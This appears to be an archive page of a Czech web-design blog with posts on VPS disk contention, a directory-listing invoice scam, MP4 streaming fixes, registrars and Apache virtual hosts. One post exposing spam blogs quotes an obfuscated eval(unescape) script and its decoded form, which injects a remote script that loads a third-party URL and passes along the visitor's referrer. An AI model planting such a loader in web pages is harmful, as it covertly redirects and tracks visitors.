PELMEL
domashneeporevo1.ru

Web & design

VPS: Není vše zlato, co se třpití

3. 3. 2013

Z nabídek webhostingů vypadají VPS (virtuální servery) jako ideální volba. zdá se, že máte parametry klasického serveru za zlomek ceny. jenže ne vše je zlato, co se třpití.

Pro sofistikovanější aplikace je klasický webhosting mnohdy nedostačující. Potřebujete víc paměti pro práci s fotkama, pro importní skripty, nebo skripty jednoduše spouštět z konzole tak, aby běžěly třeba hodinu v kuse. To na webhostingu nedáte, takže jde do hry VPS a nebo dedikovaný či managed server.

Tvoříme eshopy na zakázku a hledali jsme řešení, kdy dostaneme požadovaný výkon a bude s tím co nejmíň práce. Volba padla na VPS. E-maily jsme klientům dávali na Google Apps, takže jsme u sebe řešili pouze web, což bylo výrazně pohodlnější, protože zabezpečit bezproblémový chod pošty je dle mého názoru pro každého provozovatele za trest, nejde o to jestli stroje běží, ale musíte se starat o spamovou politiku a jeden uživatel může nerozvážným rozesláním mailů ohrozit všechny další klienty.

Aplikaci si otestujete na lokálu, víte co požadujete. My šli cestou Wedos VPS v nejvyšším tarifu, tedy 8 modulů, což výkonově znamená 4 GB RAM, 3 virtuální procesory a 120 GB místa na disku. Dle našeho testování vhodné pro více než 10 středně velkých obchodů. Bohužel dříve, než jsme stačili tuto kvótu naplnit jsme poznali temnou stránku virtuálních serverů.

1. je to pomalé, ikdyž je to rychlé

VPS nebude v principu nikdy rychlé. Tím, že je to systém v systému, tak tam bude spoždění. Virtuální procesory nikdy nebudou tak rychlé, jako reálná vlákna procesoru. Navíc čistě teoreticky hosting může dát na mašinu více VPS, resp. více virtuálů, které mají v součtu více virtuálních procesorů, než je vláken fyzického procesoru. Procesy pak jednoduše čekají. Ta doma bude řádově v ms, takže vy nic nepoznáte a hosting více vydělá. Toho bych se obával především i VPS, kdy jsou hostingy s cenou na nebo pod hranici nákladů.

Tuto problematiku jsme si uvědomili při přechodu na dedikovaný server. Aplikace lítá jak ďábel i když nemá nacachované podstránky. Je rychlejší, než nacachovaná verze na VPS. Ale to nebyl hlavní důvod odchodu z VPS.

2. I/O zařízení jsou temnou stránkou VPS

Největším problémem VPS jsou I/O zařízení, resp. tedy primárně harddisk. Ten je sdílený a není nijak omezený. Zde nastal i náš problém s WEDOSem. Dlouhé týdny jsme řešili problém, kdy nějaký další uživatel serveru, na kterém běželo naše VPS využíval své VPS k nějaké prasečině, nejspíš Warez nebo šílené zálohování (což vzhledem ke kapacitě disku nebude až tak pravděpodobné, to vyjde levněji Wedos Disk) a nám tak nejely weby, resp. se načítal několik sekund. Rychlost připomínala doby dial-up připojení a wedos nebyl schopen zjistit viníka. Většinou to končilo tak, že podpora (velmi dobře cvičené opičky) předala technikům a ti, když se na to podívali, už neviděli nic, protože prasárny onoho uživatele v tu dobu neběžely na maximum. Řešení problémů tedy skončilo tím, že aktuálně problém nepřetrvává, takže vlastně žádný nebyl.

Problém se nám podařilo vyřešit až po mé nekonečné buzeraci techniků, kteří aby měli klid ve finále navrhli, že nás přesunou na jiný server. Přikládám graf, kde jsou vidět dva týdny utrpení a poté tři týdny spokojeného běhu našeho virtuálního serveru na nové mašině.

Abych ale WEDOS jen nekritizoval, migrace VPS na jiný fyzický server proběhla z jejich strany opravdu bleskově a bez jediného problému, výpadek trval asi minutu.

 

Disk je tedy alfou a omegou celého VPS, a pokud chytnete spolu-uživatele na jiném virtuálu s podobnou aplikací, resp. chováním, jste v háji, protože webhostingy, resp. alespoň Wedos argumentoval tím, že sdílené I/O zařízení nejsou garantované, takže vlastně máte smůlu.

Závěrem asi jen to, že v našem případě to stejně dopadlo odchodem na klasický dedikáč s Intel Xeon E3 (4 vlánka, 8 procesů) a 16GB RAM. Rychlost nejde porovnat, weby na dedikáči letí mnohem rychleji a halvně pokud by se něco podělalo, víte, že je to váš problém a že to prostě je v nastavení serveru. Ne, že strávíte desítky hodin hledání chyb, zabíjíte procesy a potom zjistíte, že to dělá na tý mašině někdo jinej a vy se jen vezete s jeho problémem…

Seznam firem s.r.o. – www.sf-cz.cz

26. 10. 2011

Dnes se mi dostal na stůl dokument od Seznam firem s.r.o. – www.sf-cz.cz , který má formu smlouv a vypadá jako faktura / zálohovka. Pěkná sviňárna – o co jde?

Společnost Seznam firem s.r.o. , provozující web www.sf-cz.cz rozesílá firmám zapsaným v obchodním rejstříku tento dokument, smlouvu, zálohovou fakturu, s tím, že jim nabízí uveřejnění v katalogu firem. Celé to má ale několik háčků.

1. Nic jste si neobjednali. Přijde Vám to jak jsem již zmínil jen proto, že jste v obchodním rejstříku. Nevím jak to mají s živnostníky, ale selský rozum mi říká, že se zaměřují na firmy s větším obratem, protože účetní mnohdy neví co kdo z vedení objednal. Easy money.

2. Onen dokument je na 1990 Kč + DPH s tím, že období dle obch. podmínek (obchodní podmínky jsou malým písmem na celé zadní straně – už to samo o sobě smrdí). Nicméně na zadní straně se dočtete, že cena je za 6 měsíců, ale doba trvání smlouvy je 12 měsíců.

Tzn. když zaplatíte, souhlasíte se smlouvou a za půl roku čekejte další fakturu, kterou musíte zaplatit. A vůbec bych se nedivil, kdyby v té faktuře měli zase něco na prodloužení smlouvy :) Ale o tom nechci spekulovat, protože ten dokument neuvidím, protože oni odemě neuvidí ani korunu.

Dělají to docela chytře, přecijen dvojčička projde přes nepozornou účetní líp, než čtyřka + DPH.

Dalším háčkem je samotný katalog www.sf-cz.cz (záměrně jim nedám jediný aktivní odkaz). Katalog je naprosto nepoužitelný, vyhledává na základě několika kritérií, a nikdo vás nenajde. Katalog musí být otevřený, aby mělo smysl, že vás někdo najde. Tzn. na základě procházení kategorií. Možná je tento fakt ale cílený, protože kdyby byl otevřený, poškození by se mohli domluvit a postupovat u soudu hromadně, a to přeci Seznam firem s.r.o. a pan Radek Jež z Třebíče (jednatel a majitel v jedné osobě) nechce, že.

Další sviňárnou je řešení sporů – to je směřováno k Městskému a Krajskému soudu v Brně, tedy k nevytíženějším soudům v ČR.

 

O Seznam firem s.r.o. jinde:

Máte s podobnými podivnými či podvodnými nabídkami zkušenost? Podělte se v komentářích.

Problém s MP4 videi na webu

25. 12. 2008

Minulý týden jsem přišel na to, že mi z nějakého důvodu nejdou MP4 videa ve webových FLV přehrávačích (JW FLV Player a FlowPlayer). Hledal jsem příčinu a po několika hodinách mám funkční řešení (byť nebude jediné).

Problém je údajně v hlavičkách, u videa je potřeba při kódování nastavit „Fast start“

Tento problém řeší u již překódovaných videí program MP4Box a návod na použití je víceméně takovýto (pro Windows):

  1. Stáhněte si MP4Box zde (verze 0.4.5 mi hlásila chybu, použil jsem 0.4.4, nicméně je lepší nejdřív zkusit nejnovější verzi, třeba vám půjde)
  2. Doporučuji pro všechny případy zazálohovat původní videa, protože budou přepsaná
  3. MP4Box.exe nahrajte do složky kde máte soubory s MP4 videi
  4. Spusťte příkazový řádek (Start -> Spustit ->napište“cmd“ a OK)
  5. Otevřete si složku s MP4 videi a MP4Box na vašem disku (příkaz „cd ..“ vás dostane o adresář výše a „cd test“ otevře adresář test ve složce kde se nacházíte – nejideálnější je nahrát si videa na disk C: do složky „mp4“ a několikrát napsat „cd ..“ a až jste v c: tak „cd mp4“)
  6. Do příkazového řádku napište „MP4Box -isma nazev_videa.mp4“ a stiskněte enter
  7. MP4Box vám upraví hlavičky videa pro Fast start

Pro někoho bude jednodužším řešením program YAMB, který má uživatelsky příjemnější interface (není to příkazový řádek, ale program). Do YAMBu je třeba v nastavení vložit cestu k MP4Box (pokud vám převod nepůjde, zkuste starší verzi MP4Box)

Řešení pro Mac: Nejelegantnější řešení je pomocí programů Quicktime Pro (možnost též pro Windows) nebo Compressor (součást programu Final Cut Studio) tak, že při převodu do MP4 (kodek .H264) zaškrtnete „Prepare for internet streaming“ a poté vyberete „faststart“

Registrace domény a „on-line“ platba kreditkou

30. 4. 2008

Pro registraci domén využívám služeb FORPSI, nějak jsem si zvykl na jejich administraci a až na výjimky jsem s nimi spokojený. Včera mě ale zarazila jejich politika platby kreditkou. Jsem zvyklý, že když platím kreditkou, je to on-line platba. U forpsi to však funguje jinak.

Když platím převodem přes eBanku, mám doménu zaregistrovanou maximálně do 10minut – přijde mi, že kontrolují nové platby zhruba v 10ti minutových intervalech.

Novou doménu jsem chtěl ale ihned, a především jsem chtěl vyzkoušet, jak rychle je podle nich on-line. Původně jsem čekal že to budou třeba 2 minuty, ale bylo to 22 hodin. Po platbě jsem se podíval na účet, kde byla blokace částky ve prospěch forpsi. Po několika hodinách jsem jim napsal, v čem je problém. Odpověď pro mne byla šokem:

Dobrý večer,
platba přes tento systém se musí autorizovat, což dělá technik. Musí se spojit s bankou a ověřit, zda je karta v pořádku.
Děkujeme za pochopení.

Máte zkušenosti, jak probíhají platby kreditkou u jiných registrátorů?

Sblog.cz plný spamu a porna

29. 3. 2008

Shodou náhod jsem narazil na několik blogů na adrese sblog.cz, které jsou založeny spammery a fungují čistě pro přesměrování na pharmacy, porno, a další SPAM affiliate weby.

Způsob spamu, nebo chcete-li hacku je až trapně jednoduchý. Do stránky je vložen kódovaný javascript (pomocí funkce escape()), která je pak funkcí eval() vykonán.

Takový kód vypadá například takto:

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%69%6e%63%6c%75%64%65%5f%64%6f%6d%28%73%63%72%69%70%74%5f%66%69%6c%65%6e%61%6d%65%29%20%7b%0a%20%20%76%61%72%20%64%6f%63%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%68%65%61%64%22%29%2e%69%74%65%6d%28%30%29%0a%20%20%76%61%72%20%6a%73%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%6c%61%6e%67%75%61%67%65%22%2c%20%22%6a%61%76%61%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%74%79%70%65%22%2c%20%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%72%63%22%2c%20%73%63%72%69%70%74%5f%66%69%6c%65%6e%61%6d%65%29%0a%20%20%64%6f%63%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6a%73%29%0a%20%20%72%65%74%75%72%6e%20%66%61%6c%73%65%0a%7d%0a%66%75%6e%63%74%69%6f%6e%20%67%6f%28%29%20%7b%0a%69%6e%63%6c%75%64%65%5f%64%6f%6d%28%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%69%6e%61%6e%63%65%2d%6c%65%61%64%65%72%73%2e%63%6f%6d%2f%66%65%65%64%32%2e%70%68%70%3f%6b%65%79%77%6f%72%64%3d%22%2b%20%65%73%63%61%70%65%28%22%31%30%39%35%22%29%2b%22%26%66%65%65%64%3d%38%26%72%65%66%3d%22%2b%20%65%73%63%61%70%65%28%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%29%29%0a%20%20%72%65%74%75%72%6e%20%66%61%6c%73%65%0a%7d%0a%67%6f%28%29%3b%0a"));

Po rozkódování se ve stránce vykoná tento skript:

function include_dom(script_filename) { var doc = document.getElementsByTagName("head").item(0) var js = document.createElement("script") js.setAttribute("language", "javascript") js.setAttribute("type", "text/javascript") js.setAttribute("src", script_filename) doc.appendChild(js) return false } function go() { include_dom("http://www.finance-leaders.com/feed2.php?keyword="+ escape("1095")+"&feed=8&ref="+ escape(document.referrer)) return false } go();

Trapné, co? :)

Pro příklad 50 blogů, které patří těmto spamerům. V reálu jich bude typuju pár tisíc :) více

Člověk na výměnu odkazů

16. 2. 2008

Před pár týdny jsem přemýšlel, že bych využil služeb člověka, který hledá partnery pro výměnu odkazů. Čím víc se blížila doba, že jsme se měli domluvit, tím víc jsem pochyboval o tom, jestli to vlastně chci.

Proč jsem začal pochybovat?

Jednoznačně proto, že jsem si nebyl jistý, jestli to bude až tak přínosné. Sice ušetřím pár hodin času hledáním partnerů, ale zase budu mít tématické weby a vyberu si jen ty, které za něco stojí. Pokud máte klienta, který buduje brand a jeho značka na trhu něco znamená, nebude působit moc dobře, když na stránce s odkazy budou online hry, mp3 ke stažení zdarma a podobné nesmysly. Naopak přínosem pro všechny je, když na stránce s odkazy nalezne návštěvník stránky, které ho třeba i zaujmou.

Další obrovskou nevýhodou je, že část svého potencionálního úspěchu vložíte do rukou někoho, kdo může své služby nabídnout konkurenci. V takovém případě udělá stejnou práci pro něho a výsledkem je téměř nulový efekt a peníze v háji.

Tím, že daného člověka platíte za odkaz, je v jeho zájmu toho dohodnout co nejvíce. Jenže pokud se snaží moc, začne spamovat a tím vám dělá špatnou reklamu. Pokud pak napíšete danému webmasterovi žádost o výměnu, má vás za spamera č. 2.

Jaké máte zkušenosti s podobnými nabídkami?

Na závěr bych rád zmínil, že mám zájem o linkbuildera na jednocestné odkazy. Pokud tuto službu nabízíte, nebo o někom víte, budu rád, pokud mi dáte vědět přes komentář, nebo email.

Virtuální servery v Apache

25. 12. 2007

Každý se jednou setká s tím, že přehazovat umístění aliasu localhost mezi více adresáři (projekty) je nepraktické. Ještě méně praktické je zakládat pro tyto projekty adresáře typu localhost/projekt1/ , resp. projekt2, atd. Nemůžete pak linkovat soubory absolutně, ale musíte počítat s tím, že od rootu vás dělí ještě adresář s názvem projektu.

Nejelegantnějším a nejpraktičtějším řešením je založení aliasu – adresy pro každý projekt.

Postup je jednoduchý.

Neprve si otevřete soubor httpd.conf (nachází se ve složce, kde máte nainstalovaný apache, resp. v podsložce conf. Některé instalační balíčky obsahující apache + php + mysql, jako například wamp server, mají odkaz na httpd.conf v menu).

V httpd.conf najděte a odkomentujte (smažte #) řádek „#Include conf/extra/httpd-vhosts.conf“. Zápis virtuálních serverů by byl možný i do samotného httpd.conf, ale zápis by byl velmi nepřehledný. Tímto povolíte vložení pravidel, která budou v souboru httpd-vhosts.conf, který se nachází ve složce, kde máte nainstalovaný apache, resp. v podsložce conf/extra/. Jako výchozí je v tomto souboru nějaký příklad. Moc použitelný ovšem není. Obsah proto smažte a vložte něco na způsob kódu, který je na konci článku (v případě, že jej čtete z kategorie, tak pak rozklikněte na detail) – vzorové nastavení 3 virtuálních serverů – localhost, projekt1 a projekt2

Po tomto nastavení je třeba restartovat Apache. Aliasy těchto serverů je potřeba nastavit také v souboru hosts, který se nachází ve složce Windows, resp. podsložkách system32/drivers/etc/ (na linuxu ve složce /etc/hosts). V tomto souboru je několik příkladů. Pro výše zmíněné nastavení upravte řádek s adresou 127.0.0.1 (případně ho přidejte) takto:

127.0.0.1 localhost projekt1 projekt2

Poznámka: Na konci souboru hosts by měl být z nějakých důvodů 1 prázdný řádek

Tímto máte nastavený Apache a své 3 servery. více

Doména u ACTIVE 24? Za trest!

1. 12. 2007

Je pro mě těžko uvěřitelné, jak některé firmy vůbec mohou existovat. Konkrétně ACTIVE 24. Ceny hostingu jsou přehnané, a především neodpovídají dostupnosti. Co je ale horší je jejich administrace, ve které se vyzná asi jen proškolený operátor.

Pro jednoho klienta jsem stěhoval web z ACTIVE 24 na světhostingu.cz – za stejnou cenu mají lepší dostupnost, rozumný spam filtr a podstatně větší diskový prostor. Pokud bych chtěl to samé co nabízí světhostingu.cz v tarifu standard, u ACTIVE 24 bych za to zaplatil 5x více.

Hlavní problém, který jsem u ACTIVE 24 měl je nastavení emailů. Dostanete nějaký limit – který si sice nastavíte, ale musíte natvrdo nastavit velikost jednotlivých schránek. Jinými slovy není podstatné, že máte např. 1 GB pro emaily a uživatelé se o tento prostor podělí, ale u ACTIVE 24 musíte nastavit maximální velikosti schránek tak, aby jejich součet byl měnší nebo roven limitu (tedy například 1 GB). Toto jsem ještě nikde jinde neviděl. O spoplatnění AWStats cenou 29 Kč / měsíc nemluvě.

Zpět ale k doménám. V porovnání s FORPSI je jejich administrace silně zaostalá. Pokud nevíte NSSET, jste v háji. Oproti forpsi jej nemáte kde založit (což je problém, pokud využíváte menší zahraniční webhosting, pravděpodobnost existence NSSET u CZ NIC je hodně malá). Pokud NSSET víte, stále nemáte vyhráno. Proklikal jsem se až ke změně domény (nic neříkající ikonky bez altů a titulků jsou zde samozřejmostí) a do položky sada nameserverů jsem místo „NSS:GLOBE-SGLO000001:1“ logicky zadal „NSS:NETTIP“. Kdo byste to udělal jinak? Asi nikdo. Jenže ACTIVE 24 to nebere a NSS: se podle jejich operátora psát nemá. Nejen že to není nikde napsané, ale neskočí ani žádná chyba, která vás vyzve k odstranění prefixu NSS: – jak (ne)logické.

Doufám, že se mi povede na druhý pokus doménu přesunout na svět hostingu. Nerad bych řešil podobné nelogické nastavení v PHP, příp. Apache (resp. jeho modulech, pokud je ACTIVE 24 vůbec nabízí)

Pípni.cz – faktury za FREE tarif!

4. 11. 2007

Kdysi jsem dělal stránky mému kamarádovi a vzhledem k tomu, že do toho nechtěl investovat, umístil jsem je na pípni.cz a dál se o to víceméně nestaral.

Včera mi ale došel email, že je třeba prodloužit webhosting a poslali mi zálohovou fakturu na PROFI tarif. Čekal jsem co se bude dít. Žádné vyjádření od provozovatelů nepřišlo, tak jsem se podíval do diskusního fóra pípni.cz a paradoxně se tento problém odehrával už minulý měsíc. Tehdy se k tomu vyjádřil Petr Šimonek takto (do původního vyjádření jsem doplnil diakritiku):

Dobrý den,
freehosting se neruší. Omlouváme se, ale pár faktur se vygenerovalo omylem, které měly jít jen klientům s nezaplacenýma fakturama. Pokud chcete zůstat na free tak nic platit nemusíte.
Petr Šimonek

Jako omluva dostačující, kdyby ale pípni dohledalo chybu v generování a všem, kteří hostují na free a dostali tento mail by poslalo omluvu na adresu, kam přisla i výzva k zaplacení.

Vzhledem k tomu, že pípni hostuje přes 41 tisíc domén a dovolím si tvrdit, že minimálně polovinu na FREE tarifu (usuzuji z toho, že si nedokážu představit člověka, který hostuje za 1000,- ročně na hostingu s garantovanou dostupností 99,5%, když jsou v této kategorii na trhu hráči jako Český hosting, Český webhosting (C4), Svět hostingu, aj.), přijde mi to jako velmi dobrý (vůbec ne ale férový) způsob, jak přesunout zákazníky z neplaceného na placený tarif :)

Google PageRank – update a změna algoritmu?

27. 10. 2007

Vše nasvědčuje tomu, že Google mění svůj PageRank algoritmus. Diskuse pro webmastery mají poslední dny převážně jediné téma – Update Google PageRanku – A paradoxně všichni se diví, proč se jejich PR propadl.

Názory se různí. Jedni píší o ryze novém algoritmu, jiní spíš o automatických či manuálních penalizacích.

Kdyby se propad týkal webů, které mají v patičce desítky odkazů, nebylo by se čemu divit a penalizace by byla naprosto zasloužená. Jenže propad PageRanku se týká i webů, které se dají považovat za důvěryhodné – např:

Buď jak buď, Google tím docílil toho, o čem se diskutovalo poslední měsíce – zasadil velkou ránu obchodu s odkazy.

RSS